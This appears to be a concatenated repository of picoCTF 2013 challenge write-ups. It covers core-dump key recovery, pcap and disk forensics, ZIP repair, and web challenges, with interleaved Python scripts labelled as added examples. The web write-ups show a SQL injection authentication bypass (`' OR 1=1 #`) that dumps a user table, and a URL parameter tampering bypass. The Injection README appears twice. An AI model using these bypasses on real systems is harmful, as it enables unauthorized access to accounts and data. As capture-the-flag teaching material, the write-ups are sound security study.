Running the core file and binary through GDB with the following commands: 17 | 18 | ```linux 19 | root@neuron:~$ gdb cryptor core.26474 20 | (gdb) bt 21 | #0 0x08048564 in swap (sbox=0xffffd17c "", i=-11652, j=16) at cryptor.c:7 22 | #1 0x08048719 in crypt (inf=0x0, keyf=0xffffd17c, outf=0xf7ffda5c) at cryptor.c:42 23 | #2 0x08048894 in main (argc=4, argv=0xffffd374) at cryptor.c:67 24 | (gdb) f 1 25 | #1 0x08048719 in crypt (inf=0x0, keyf=0xffffd17c, outf=0xf7ffda5c) at cryptor.c:42 26 | 42 tmp ^= next_prg(sbox,&i,&j); 27 | (gdb) info locals 28 | sbox = "\000\001\002\003\004\005\006\a\b\t\n\v\f\r\016\017\020\021\022\023\024\025\026\027\030\031\032\033\034\035\036\037 !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\177\200\201\202\203\204\205\206\207\210\211\212\213\214\215\216\217\220\221\222\223\224\225\226\227\230\231\232\233\234\235\236\237\240\241\242\243\244\245\246\247\250\251\252\253\254\255\256\257\260\261\262\263\264\265\266\267\270\271\272\273\274\275\276\277\300\301\302\303\304\305\306\307\310\311\312\313\314\315\316\317\320\321\322\323\324\325\326\327\330\331\332\333\334\335\336\337\340\341\342\343\344\345\346\347\350\351\352\353\354\355\356\357\360\361\362\363\364\365\366\367\370\371\372\373\374\375\376\377" 29 | i = 0 30 | j = -135168078 31 | key = "\305\344L\004\273/\\\020\272u\033×L\334", 32 | tmp = 247 '\367' 33 | ``` 34 | 35 | So we see that there is a key variable here. At first, we wondered what to do with it, what did "incomplete sequence" mean? We decided to ignore it, because if you refer back to the code, you know that the key will be 16 bytes long. We took the key, turned into hex so Python wouldn't have any trouble with it, and we got our result. 
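How that conversion from gdb's rendering of `key` to the 16 hex bytes works, as an added Python 3 example that is not from the write-up: gdb prints unprintable bytes as octal escapes and decodable UTF-8 as text (the "×" stands for the bytes c3 97), and it reports the final byte as an incomplete sequence; the assumption that this byte is `\334` (0xdc), which makes the 16-byte key match the hex used below, is labelled in the code. The RC4 routine is a bytes-based port of the one below, checked against a published test vector before it is trusted with the recovered key.

```python
# Added example, not from the write-up: decode the key as gdb printed it, and
# validate an RC4 implementation before using it with that key.
import re

# The `key` local exactly as it appears in the gdb output above.
GDB_KEY_LITERAL = r'\305\344L\004\273/\\\020\272u\033×L\334'
# Assumption: the byte gdb reported as an "incomplete sequence" is \334 (0xdc);
# with it the key is 16 bytes and equals the hex string the write-up decrypts with.
TRAILING_BYTE = b"\xdc"

_SIMPLE_ESCAPES = {"n": 10, "t": 9, "r": 13, "a": 7, "b": 8, "f": 12, "v": 11,
                   "e": 27, "\\": 92, '"': 34, "'": 39}


def gdb_cstring_to_bytes(s):
    """Decode a C string the way gdb prints it: \\ooo octal escapes, C escapes, UTF-8 text."""
    out = bytearray()
    i = 0
    while i < len(s):
        ch = s[i]
        if ch != "\\":
            out += ch.encode("utf-8")          # printable text, possibly multi-byte
            i += 1
            continue
        nxt = s[i + 1]
        if nxt in "01234567":                  # \ooo: one to three octal digits
            m = re.match(r"[0-7]{1,3}", s[i + 1:])
            out.append(int(m.group(0), 8))
            i += 1 + len(m.group(0))
        elif nxt in _SIMPLE_ESCAPES:
            out.append(_SIMPLE_ESCAPES[nxt])
            i += 2
        else:
            raise ValueError("unknown escape \\%s" % nxt)
    return bytes(out)


def rc4(key, data):
    """RC4 key scheduling plus keystream generation; encrypt and decrypt are the same."""
    S = list(range(256))
    j = 0
    for i in range(256):                       # KSA
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:                          # PRGA
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def recovered_key():
    """The 16-byte RC4 key as recovered from the core dump's `key` local."""
    return gdb_cstring_to_bytes(GDB_KEY_LITERAL) + TRAILING_BYTE


if __name__ == "__main__":
    print(recovered_key().hex())               # c5e44c04bb2f5c10ba751bc3974cdcdc
```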
36 | 37 | ```python 38 | import random, base64 39 | def crypt(data, key): 40 | x = 0 41 | box = range(256) 42 | for i in range(256): 43 | x = (x + box[i] + ord(key[i % len(key)])) % 256 44 | box[i], box[x] = box[x], box[i] 45 | x = y = 0 46 | out = [] 47 | for char in data: 48 | x = (x + 1) % 256 49 | y = (y + box[x]) % 256 50 | box[x], box[y] = box[y], box[x] 51 | out.append(chr(ord(char) ^ box[(box[x] + box[y]) % 256])) 52 | return ''.join(out) 53 | with open('ENCRYPTED', 'rb') as f: 54 | content = f.read() 55 | print crypt(content, 'c5e44c04bb2f5c10ba751bc3974cdcdc'.decode('hex')) 56 | ``` 57 | 58 | The message, decrypted with RC4, was: 59 | 60 | ``` 61 | Well, assuming you're able to actually keep the secret keyfile safe, this is a legitimate way to encrypt files! 62 | Your key is: astronomy_ceremony_times 63 | ``` 64 | 65 | **Answer:** astronomy_ceremony_times 66 | 67 | ## Other write-ups and resources 68 | 69 | * none yet -------------------------------------------------------------------------------- /pico-ctf-2013/core-decryption/core_decrypt.tar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/core-decryption/core_decrypt.tar -------------------------------------------------------------------------------- /pico-ctf-2013/core-decryption/solve.py: -------------------------------------------------------------------------------- 1 | import random, base64 2 | def crypt(data, key): 3 | x = 0 4 | box = range(256) 5 | for i in range(256): 6 | x = (x + box[i] + ord(key[i % len(key)])) % 256 7 | box[i], box[x] = box[x], box[i] 8 | x = y = 0 9 | out = [] 10 | for char in data: 11 | x = (x + 1) % 256 12 | y = (y + box[x]) % 256 13 | box[x], box[y] = box[y], box[x] 14 | out.append(chr(ord(char) ^ box[(box[x] + box[y]) % 256])) 15 | return ''.join(out) 16 | with open('ENCRYPTED', 'rb') as f: 17 | content = f.read() 18 | print 
crypt(content, 'c5e44c04bb2f5c10ba751bc3974cdcdc'.decode('hex')) -------------------------------------------------------------------------------- /pico-ctf-2013/dark-star/README.md: -------------------------------------------------------------------------------- 1 | # PicoCTF 2013: Dark Star 2 | 3 | **Category:** Forensic 4 | **Points:** 110 5 | **Description:** 6 | 7 | > Sure are a lot of stars [out there](https://2013.picoctf.com/problems/darkstar.img)... but there's a lot of empty space for things to hide in, too. 8 | > 9 | > The disk image can be found on the shell machines at `/problems/dark_star.img` and the contents of the image are available in `/problems/dark_star/` 10 | > 11 | > [Offline file](darkstar.img) 12 | 13 | ## Write-up 14 | 15 | Use tool [Autopsy](http://www.sleuthkit.org/autopsy/) > Create NewCase and import image file into it. 16 | 17 | ![](solve.png) 18 | 19 | ``` 20 | Key: Stars hide your fires 21 | ``` 22 | 23 | **Answer:** Stars hide your fires 24 | 25 | ## Other write-ups and resources 26 | 27 | * none yet -------------------------------------------------------------------------------- /pico-ctf-2013/dark-star/darkstar.img: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/dark-star/darkstar.img -------------------------------------------------------------------------------- /pico-ctf-2013/dark-star/solve.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/dark-star/solve.png -------------------------------------------------------------------------------- /pico-ctf-2013/ddos-detection/README.md: -------------------------------------------------------------------------------- 1 | # PicoCTF 2013: DDoS Detection 2 | 3 | **Category:** Forensic 4 | **Points:** 85 5 
| **Description:** 6 | 7 | > It appears a SYN-flood style DDoS has been carried out on this system. Send us a list of the IP addresses of the attackers (in any order, separated by spaces), so we can track them down and stop them. 8 | > 9 | > Pcap available to download [here](https://2013.picoctf.com/problems/syn_attack.pcap), or available to analyse online [at CloudShark](http://www.cloudshark.org/captures/88971318a309) 10 | > 11 | > [offline file](syn_attack.pcap) 12 | 13 | ## Write-up 14 | 15 | First, what a SYN flood is: the attacker sends a large number of TCP packets with only the SYN flag set and never completes the handshake, so for each one the server keeps a half-open connection until it times out. The half-open queue fills faster than it drains, and the server stops accepting legitimate connections. 16 | 17 | Open the pcap in Wireshark and look at `Statistics > Conversations`: 18 | 19 | ![](conversations.png) 20 | 21 | => Server (victim): 128.237.255.81 22 | 23 | Use a display filter to keep only the bare SYNs (SYN set, ACK clear) sent to the victim: 24 | 25 | ``` 26 | tcp && ip.dst == 128.237.255.81 && tcp.flags.syn == 1 && tcp.flags.ack == 0 27 | ``` 28 | 29 | Every source address left after filtering is an attacker. (In a real SYN flood the source addresses are usually spoofed, so what the capture gives is the list of claimed sources; that is what the challenge asks for.) 
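The same two steps (find the host receiving the bare SYNs, then list who sent them) as an added Python script, not part of the original write-up. Only the standard library is used and the classic libpcap format is parsed by hand (Ethernet/IPv4/TCP; pcapng is not handled). The capture in the script is constructed inline so it runs offline; the bytes of the real `syn_attack.pcap` can be passed to the same functions.

```python
"""Added example, not part of the original write-up: the Wireshark steps
above done in plain Python. Only the standard library is used; the capture
is parsed by hand (classic libpcap, Ethernet/IPv4/TCP; pcapng not handled).
The sample capture below is constructed, not the challenge file."""
import struct
from collections import Counter

ETH_IPV4 = 0x0800
IPPROTO_TCP = 6
TCP_SYN, TCP_ACK = 0x02, 0x10


def iter_frames(pcap: bytes):
    """Yield the raw frames of a libpcap capture, either byte order."""
    if pcap[:4] == b"\xd4\xc3\xb2\xa1":
        end = "<"
    elif pcap[:4] == b"\xa1\xb2\xc3\xd4":
        end = ">"
    else:
        raise ValueError("not a classic libpcap file")
    off = 24                                   # global header
    while off + 16 <= len(pcap):               # per-packet record header
        _sec, _usec, incl_len, _orig_len = struct.unpack(end + "IIII", pcap[off:off + 16])
        off += 16
        yield pcap[off:off + incl_len]
        off += incl_len


def parse_tcp(frame: bytes):
    """(src, dst, tcp_flags) for an Ethernet/IPv4/TCP frame, None for anything else."""
    if len(frame) < 34 or struct.unpack("!H", frame[12:14])[0] != ETH_IPV4:
        return None
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    if ip[0] >> 4 != 4 or ip[9] != IPPROTO_TCP or len(ip) < ihl + 20:
        return None
    src = ".".join(str(b) for b in ip[12:16])
    dst = ".".join(str(b) for b in ip[16:20])
    return src, dst, ip[ihl + 13]              # TCP flags byte


def bare_syns(pcap: bytes):
    """Packets with SYN set and ACK clear: handshake openers, not replies."""
    for frame in iter_frames(pcap):
        p = parse_tcp(frame)
        if p and p[2] & TCP_SYN and not p[2] & TCP_ACK:
            yield p


def likely_victim(pcap: bytes):
    """The 'Conversations' step: whoever receives the most bare SYNs."""
    dsts = Counter(dst for _src, dst, _flags in bare_syns(pcap))
    return dsts.most_common(1)[0][0] if dsts else None


def syn_sources(pcap: bytes, victim: str) -> Counter:
    """Same as the display filter
    tcp && ip.dst == victim && tcp.flags.syn == 1 && tcp.flags.ack == 0,
    reduced to source address -> number of bare SYNs sent."""
    return Counter(src for src, dst, _flags in bare_syns(pcap) if dst == victim)


# --- constructed sample capture (not the challenge file) -------------------
def build_frame(src: str, dst: str, flags: int, sport: int = 40000, dport: int = 80) -> bytes:
    eth = b"\x00" * 12 + struct.pack("!H", ETH_IPV4)
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, flags, 8192, 0, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 1, 0, 64, IPPROTO_TCP, 0,
                     bytes(int(o) for o in src.split(".")),
                     bytes(int(o) for o in dst.split(".")))
    return eth + ip + tcp                      # checksums left zero: not verified here


def build_pcap(frames) -> bytes:
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)   # link type 1 = Ethernet
    for i, f in enumerate(frames):
        out += struct.pack("<IIII", i, 0, len(f), len(f)) + f
    return out


VICTIM = "128.237.255.81"                      # the server found in the write-up
SAMPLE_PCAP = build_pcap([
    build_frame("10.0.0.1", VICTIM, TCP_SYN),
    build_frame("10.0.0.2", VICTIM, TCP_SYN),
    build_frame("10.0.0.1", VICTIM, TCP_SYN, sport=40001),
    build_frame(VICTIM, "10.0.0.1", TCP_SYN | TCP_ACK),   # server reply: ACK set, excluded
    build_frame("192.0.2.9", VICTIM, TCP_ACK),            # established traffic, excluded
    build_frame("192.0.2.9", "203.0.113.5", TCP_SYN),     # SYN to another host, excluded
])

if __name__ == "__main__":
    victim = likely_victim(SAMPLE_PCAP)
    print("victim:", victim)
    print(" ".join(sorted(syn_sources(SAMPLE_PCAP, victim))))
```

The `Counter` returned by `syn_sources()` also gives per-source SYN counts, which is what separates a flood participant from one client that merely opened a connection; on the challenge capture every listed source qualifies, but on real traffic a threshold on that count is the first thing to add.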
30 | 31 | `Statistics > IP Addresses` (with the display filter still applied) lists them: 32 | 33 | **Answer:** 34 | 35 | ``` 36 | 121.168.84.32 75.214.206.60 21.241.212.197 55.53.190.191 71.113.17.64 120.130.138.152 171.128.49.99 104.220.68.36 241.210.41.46 33.24.97.48 115.99.66.210 154.29.81.178 69.232.82.51 234.183.31.38 102.146.88.253 196.132.138.81 63.193.172.89 16.6.74.206 94.148.118.202 160.116.210.243 248.237.9.18 161.147.211.153 207.137.67.221 229.61.253.52 180.70.211.154 132.214.137.24 132.42.241.177 65.248.11.247 49.201.237.5 51.145.58.158 37 | ``` 38 | 39 | ## Other write-ups and resources 40 | 41 | * none yet -------------------------------------------------------------------------------- /pico-ctf-2013/ddos-detection/conversations.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/ddos-detection/conversations.png -------------------------------------------------------------------------------- /pico-ctf-2013/ddos-detection/syn_attack.pcap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/ddos-detection/syn_attack.pcap -------------------------------------------------------------------------------- /pico-ctf-2013/failure-to-boot/README.md: -------------------------------------------------------------------------------- 1 | # PicoCTF 2013: Failure To Boot 2 | 3 | **Category:** Trivia 4 | **Points:** 20 5 | **Description:** 6 | 7 | > After opening the robot's front panel and looking inside, you discover a small red button behind a tangle of wires. Pressing the button lights up the robot's primary screen. It glows black and quickly flashes blue. 
A line of small text types out: 8 | > 9 | > ```ERROR: 0x00000023``` 10 | > 11 | > The text refreshes and displays the prompt: 12 | > 13 | > FILE SYSTEM RECOVERY INITIATED... 14 | > 15 | > FILE SYSTEM COULD NOT BE IDENTIFIED... 16 | > 17 | > PLEASE ENTER FILE SYSTEM FORMAT: 18 | 19 | ## Write-up 20 | 21 | Searching for `ERROR: 0x00000023` turns up the Windows bug check that this code belongs to. 22 | 23 | `STOP 0x00000023: FAT_FILE_SYSTEM` is raised by the FAT file system driver, `Fastfat.sys`, so the format being asked for is FAT. 24 | 25 | **Answer:** FAT 26 | 27 | ## Other write-ups and resources 28 | 29 | * none yet -------------------------------------------------------------------------------- /pico-ctf-2013/first-contact/README.md: -------------------------------------------------------------------------------- 1 | # PicoCTF 2013: First Contact 2 | 3 | **Category:** Network 4 | **Points:** 40 5 | **Description:** 6 | 7 | > You notice that the indicator light near the robot’s antenna begins to blink. Perhaps the robot is connecting to a network? Using a wireless card and the network protocol analyzer Wireshark, you are able to create a PCAP file containing the packets sent over the network. 8 | > 9 | > You suspect that the robot is communicating with the crashed ship. Your goal is to find the location of the ship by inspecting the network traffic. 10 | > 11 | > You can perform the analysis online on [Cloudshark](http://www.cloudshark.org/captures/bc1c0a7fae2c) or you can download the [PCAP file](https://2013.picoctf.com/problems/first_contact.pcap). 
12 | > 13 | > [file offline](first_contact.pcap) 14 | 15 | ## Write-up 16 | 17 | Open the file in Wireshark, select one of the TCP packets and choose Follow TCP Stream: 18 | 19 | ``` 20 | AWAITING NEW LOCATION STATUS 21 | NEW LOCATION STATUS: 302 22 | NEW LOCATION COORDINATES: 37 14'06"N 115 48'40"W 23 | NEW LOCATION INFO: LOCKED 24 | NEW LOCATION UPDATE COMPLETE 25 | NEW LOCATION UPDATE SUCCESS 26 | ``` 27 | 28 | **Answer:** ```37 14'06"N 115 48'40"W``` 29 | 30 | ## Other write-ups and resources 31 | 32 | * none yet -------------------------------------------------------------------------------- /pico-ctf-2013/first-contact/first_contact.pcap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/first-contact/first_contact.pcap -------------------------------------------------------------------------------- /pico-ctf-2013/getkey/README.md: -------------------------------------------------------------------------------- 1 | # PicoCTF 2013: GETKey 2 | 3 | **Category:** WebVuln 4 | **Points:** 50 5 | **Description:** 6 | 7 | > There's bound to be a key on the spaceport's [hidden website](https://2013.picoctf.com/problems/getquery/index.php) 8 | 9 | ## Write-up 10 | 11 | The relevant part of the page's HTML is similar to: 12 | 13 | ```html 14 | 
15 | 16 | 17 |

18 |
19 | ``` 20 | 21 | The form uses ```method="GET"```, so the values of its fields travel in the URL, where anyone can change them; the server then trusts a client-supplied `admin` flag, which is the actual bug. 22 | 23 | Original: 24 | 25 | ``` 26 | [...]/index.php?admin=false&competition=ccdc 27 | ``` 28 | 29 | Changing both parameters by hand gives the flag: 30 | 31 | ``` 32 | [...]/index.php?admin=true&competition=picoctf 33 | 34 | FLAG: 9fa449c061d64f58de600dfacaa6bd5d 35 | ``` 36 | 37 | **Answer:** 9fa449c061d64f58de600dfacaa6bd5d 38 | 39 | ## Other write-ups and resources 40 | 41 | * none yet -------------------------------------------------------------------------------- /pico-ctf-2013/getkey/index.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 16 | 17 | 18 | FLAG: $key

"); 26 | } else { 27 | echo("Either you aren't admin or wrong competition"); 28 | } 29 | ?> 30 |
31 | 32 | 33 |

34 |
35 | 36 | 37 | -------------------------------------------------------------------------------- /pico-ctf-2013/grep-is-your-friend/README.md: -------------------------------------------------------------------------------- 1 | # PicoCTF 2013: Grep is Your Friend 2 | 3 | **Category:** Trivia 4 | **Points:** 40 5 | **Description:** 6 | 7 | > After plugging the robot into the computer, the robot asks for the name of a file containing the string `SECRET AUTH CODE`. You can find it using the [command-line interface](https://2013.picoctf.com/webshell) in `/problems/grep.tar` or by downloading [all of the files](https://2013.picoctf.com/problems/grep.tar). 8 | > 9 | > [file offline](grep.tar) 10 | 11 | ## Write-up 12 | 13 | On a Linux host, unpack the tar archive and search every file in it with `grep`. When given more than one file, grep prefixes each match with the file name, which is exactly what the robot asks for: 14 | 15 | ```bash 16 | $ tar xvf grep.tar 17 | $ cd grep 18 | $ grep "SECRET AUTH CODE" * 19 | fHYYpdrfeOCHyQicfe96xfw==: SECRET AUTH CODES 20 | ``` 21 | 22 | **Answer:** fHYYpdrfeOCHyQicfe96xfw== 23 | 24 | ## Other write-ups and resources 25 | 26 | * none yet -------------------------------------------------------------------------------- /pico-ctf-2013/in-hex-no-one-can-hear-you-complain/README.md: -------------------------------------------------------------------------------- 1 | # PicoCTF 2013: In Hex, No One Can Hear You Complain 2 | 3 | **Category:** Forensic 4 | **Points:** 90 5 | **Description:** 6 | 7 | > While flying through the outskirts of the Ripley system, you notice a distress signal from one of the outer moons. It appears a ship has crash-landed near a 16-sided pyramid. The lone survivor, a [docx file](https://2013.picoctf.com/problems/kane.docx), tells you that a malicious programmer has embedded an egg in his chest and he's afraid that it's going to hatch. He offers his assistance if you can help find the egg. 8 | > 9 | > [Offline file](kane.docx) 10 | 11 | ## Write-up 12 | 13 | First, keep in mind that a .docx file is an ordinary ZIP archive. 
14 | 15 | Unzip it and the flag is easy to spot in `word/media/key.png`: 16 | 17 | ![](key.png) 18 | 19 | **Answer:** docx_why_not_docz 20 | 21 | ## Other write-ups and resources 22 | 23 | * none yet -------------------------------------------------------------------------------- /pico-ctf-2013/in-hex-no-one-can-hear-you-complain/kane.docx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/in-hex-no-one-can-hear-you-complain/kane.docx -------------------------------------------------------------------------------- /pico-ctf-2013/in-hex-no-one-can-hear-you-complain/key.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/in-hex-no-one-can-hear-you-complain/key.png -------------------------------------------------------------------------------- /pico-ctf-2013/injection/README.md: -------------------------------------------------------------------------------- 1 | # PicoCTF 2013: Injection 2 | 3 | **Category:** Web Vuln 4 | **Points:** 110 5 | **Description:** 6 | 7 | > Use the Loading Bay Control System to get the admin key! [Problem](https://2013.picoctf.com/problems/injection/) 8 | 9 | ## Write-up 10 | 11 | The challenge is called "Injection" and it is a web-based authentication page. Chances are this is some kind of SQL injection challenge, and we need to bypass the authentication, as we don't know a valid username. 12 | 13 | Google for [sql-injection-authentication-bypass-cheat-sheet](https://pentestlab.wordpress.com/2012/12/24/sql-injection-authentication-bypass-cheat-sheet/) 14 | 15 | Submitting `' OR 1=1 #` as the username makes the WHERE clause true for every row (the `#` comments out the rest of the MySQL query), so the page dumps the whole table: 16 | 17 | ``` 18 | Username: user177 Hash: 53e33afe47d6951aa21b90741f11e711 19 | 20 | Username: user178 Hash: 7efdd69b03fbb5cf805419bd1044f558 21 | 22 | Username: admin Hash: bad_code_and_databases_is_no_fun 23 | ``` 24 | 25 | **Answer:** bad_code_and_databases_is_no_fun 26 | 27 | ## Other write-ups and resources 28 | 29 | * none yet -------------------------------------------------------------------------------- /pico-ctf-2013/injection/index.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 
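The lookup that `' OR 1=1` breaks, rebuilt as an added example (not the challenge's own index.php) on an in-memory SQLite database so the dump can be reproduced offline, next to a parameterised lookup that the same input cannot break. The table layout and the exact SQL text are assumptions; the PHP reproduced below only shows that rows carry a `username` and a `hash`, and that the literal name `admin` is refused before the query runs. The rows are the ones the challenge printed.

```python
"""Added example, not the challenge's own index.php: the injectable
username lookup on SQLite, beside the parameterised fix. Table layout
and SQL text are assumptions; the rows are those the challenge printed."""
import sqlite3

ROWS = [
    ("user177", "53e33afe47d6951aa21b90741f11e711"),
    ("user178", "7efdd69b03fbb5cf805419bd1044f558"),
    ("admin", "bad_code_and_databases_is_no_fun"),
]


def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, hash TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)", ROWS)
    return db


def lookup_vulnerable(db: sqlite3.Connection, username: str) -> list:
    """String-built query: the input is pasted into the SQL grammar."""
    sql = "SELECT username, hash FROM users WHERE username = '%s'" % username
    return db.execute(sql).fetchall()


def lookup_fixed(db: sqlite3.Connection, username: str) -> list:
    """Parameterised query: the input is only ever compared as a value."""
    sql = "SELECT username, hash FROM users WHERE username = ?"
    return db.execute(sql, (username,)).fetchall()


def retrieve_key(db: sqlite3.Connection, username: str, fixed: bool = False):
    """The challenge's flow: refuse the literal name 'admin', then look up.
    The blacklist does nothing against injection: the payload is not
    equal to 'admin', yet the vulnerable query still returns the admin row."""
    if username == "admin":
        return "I'm not allowed to tell you the admin password."
    return (lookup_fixed if fixed else lookup_vulnerable)(db, username)


# SQLite comments run from '--' to end of line; MySQL also accepts the '#'
# used in the write-up, SQLite does not.
PAYLOAD = "' OR 1=1 -- "

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", retrieve_key(db, PAYLOAD))
    print("fixed:     ", retrieve_key(db, PAYLOAD, fixed=True))
```

With the payload the vulnerable query becomes `WHERE username = '' OR 1=1 -- '`, which matches every row; the parameterised version looks for a user literally named `' OR 1=1 -- ` and finds nothing.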
12 | 13 | Google for [sql-injection-authentication-bypass-cheat-sheet](https://pentestlab.wordpress.com/2012/12/24/sql-injection-authentication-bypass-cheat-sheet/) 14 | 15 | Trying `' OR 1=1 #` and it's bug: 16 | 17 | ``` 18 | Username: user177 Hash: 53e33afe47d6951aa21b90741f11e711 19 | 20 | Username: user178 Hash: 7efdd69b03fbb5cf805419bd1044f558 21 | 22 | Username: admin Hash: bad_code_and_databases_is_no_fun 23 | ``` 24 | 25 | **Answer:** bad_code_and_databases_is_no_fun 26 | 27 | ## Other write-ups and resources 28 | 29 | * none yet -------------------------------------------------------------------------------- /pico-ctf-2013/injection/index.php: -------------------------------------------------------------------------------- 1 | 2 | 3 |

Welcome to Loading Bay Control System.

4 |

Please input username to retrieve key.

5 |
6 | Username:
7 |
8 | 9 | Username: " . $row['username']); 21 | echo(" Hash: " . $row['hash'] . "

"); 22 | } 23 | } 24 | mysqli_close($c); 25 | } 26 | else 27 | { 28 | echo("

I'm not allowed to tell you the admin password.

"); 29 | } 30 | } 31 | 32 | ?> 33 | 34 | 35 | 36 | 37 | 38 | -------------------------------------------------------------------------------- /pico-ctf-2013/navsat/README.md: -------------------------------------------------------------------------------- 1 | # PicoCTF 2013: NAVSAT 2 | 3 | **Category:** Forensic 4 | **Points:** 70 5 | **Description:** 6 | 7 | > Near the Sun, you find a malfunctioning warp beacon which is broadcasting a distress signal in a navigational channel. It looks like it's been damaged by solar radiation, and [some of its data](https://2013.picoctf.com/problems/recovery.zip) have been corrupted. If you can recover it, perhaps it will point at you to something interesting. 8 | > 9 | > [Offline file](recovery.zip) 10 | 11 | ## Write-up 12 | 13 | Opening the archive in WinRAR lists a `key.txt`, but extracting it fails: 14 | 15 | ``` 16 | ! [...]\NAVSAT\recovery.zip: The archive is corrupt 17 | ``` 18 | 19 | Look at the file in a hex editor: 20 | 21 | ``` 22 | 00000000 3F 3F 03 04 0A 00 00 00 00 00 22 79 8E 42 F6 7D ??........"yŽBö} 23 | 00000010 2E EF 1B 00 00 00 1B 00 00 00 0F 00 1C 00 4D 61 .ï............Ma 24 | 00000020 67 37 2D 42 57 2F 6B 65 79 2E 74 78 74 55 54 09 g7-BW/key.txtUT. 25 | 00000030 00 03 D0 FE 6A 51 0B FF 6A 51 75 78 0B 00 01 04 ..ÐþjQ.ÿjQux.... 26 | 00000040 E8 03 00 00 04 E8 03 00 00 4B 65 79 3A 20 4E 65 è....è...Key: Ne 27 | 00000050 78 74 20 73 74 6F 70 20 54 61 75 20 45 72 69 64 xt stop Tau Erid 28 | 00000060 61 6E 69 0A 50 4B 03 04 14 00 00 00 08 00 27 B6 ani.PK........'¶ 29 | 00000070 47 32 1B A6 C8 9C E4 52 04 00 8C 36 05 00 14 00 G2.¦ÈœäR..Œ6.... 30 | 00000080 1C 00 4D 61 67 37 2D 42 57 2F 43 68 61 72 74 2D ..Mag7-BW/Chart- 31 | 00000090 31 35 2E 70 64 66 55 54 09 00 03 BA 36 08 42 AF 15.pdfUT...º6.B¯ 32 | ``` 33 | 34 | The contents of key.txt are already readable in the dump: the member is stored uncompressed (compression method `00 00` at offset 8 of the local header), so nothing hides it. 
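The repair described in this write-up as an added Python script (not part of the original): it walks the intact central directory to find every member whose local file header signature no longer reads `50 4B 03 04`, writes the signature back, and confirms that the key was visible in the raw bytes all along because the member was stored uncompressed. The damaged archive is constructed in memory so the script runs offline; the same functions take the bytes of the real `recovery.zip`.

```python
"""Added example, not part of the original write-up: repair a ZIP whose
local file header signature was overwritten (3F 3F 03 04 where
50 4B 03 04 belongs), as in recovery.zip. The damaged archive below is
constructed in memory; it is not the challenge file."""
import io
import zipfile

LOCAL_SIG = b"PK\x03\x04"    # local file header
CENTRAL_SIG = b"PK\x01\x02"  # central directory entry
EOCD_SIG = b"PK\x05\x06"     # end of central directory record


def damaged_local_headers(data: bytes) -> list:
    """Offsets of local headers whose signature no longer reads PK\\x03\\x04.

    The central directory at the end of the file (intact here, which is
    why WinRAR could still list key.txt) records every member's local
    header offset, so it is the reliable way to find them."""
    eocd = data.rfind(EOCD_SIG)
    if eocd < 0:
        raise ValueError("no end-of-central-directory record; too damaged for this repair")
    pos = int.from_bytes(data[eocd + 16:eocd + 20], "little")  # central directory offset
    bad = []
    while data[pos:pos + 4] == CENTRAL_SIG:
        name_len = int.from_bytes(data[pos + 28:pos + 30], "little")
        extra_len = int.from_bytes(data[pos + 30:pos + 32], "little")
        comment_len = int.from_bytes(data[pos + 32:pos + 34], "little")
        local_off = int.from_bytes(data[pos + 42:pos + 46], "little")
        if data[local_off:local_off + 4] != LOCAL_SIG:
            bad.append(local_off)
        pos += 46 + name_len + extra_len + comment_len
    return bad


def repair_zip(data: bytes) -> bytes:
    """Write PK\\x03\\x04 back over every damaged local header signature."""
    fixed = bytearray(data)
    for off in damaged_local_headers(data):
        fixed[off:off + 4] = LOCAL_SIG
    return bytes(fixed)


def extract_member(data: bytes, name: str):
    """Member contents, or None when the reader rejects the local header."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            return zf.read(name)
    except zipfile.BadZipFile:
        return None


def build_damaged_sample(key_text: bytes) -> bytes:
    """Constructed stand-in for recovery.zip: key.txt stored uncompressed
    (method 0, as bytes 8-9 of the dump show), first two bytes overwritten."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", compression=zipfile.ZIP_STORED) as zf:
        zf.writestr("Mag7-BW/key.txt", key_text)
    data = bytearray(buf.getvalue())
    data[0:2] = b"??"            # 3F 3F, exactly what the write-up's dump shows
    return bytes(data)


KEY = b"Key: Next stop Tau Eridani\n"
SAMPLE = build_damaged_sample(KEY)

if __name__ == "__main__":
    print("damaged headers at:", damaged_local_headers(SAMPLE))
    print("key visible in raw bytes:", KEY in SAMPLE)
    print("extract before repair:", extract_member(SAMPLE, "Mag7-BW/key.txt"))
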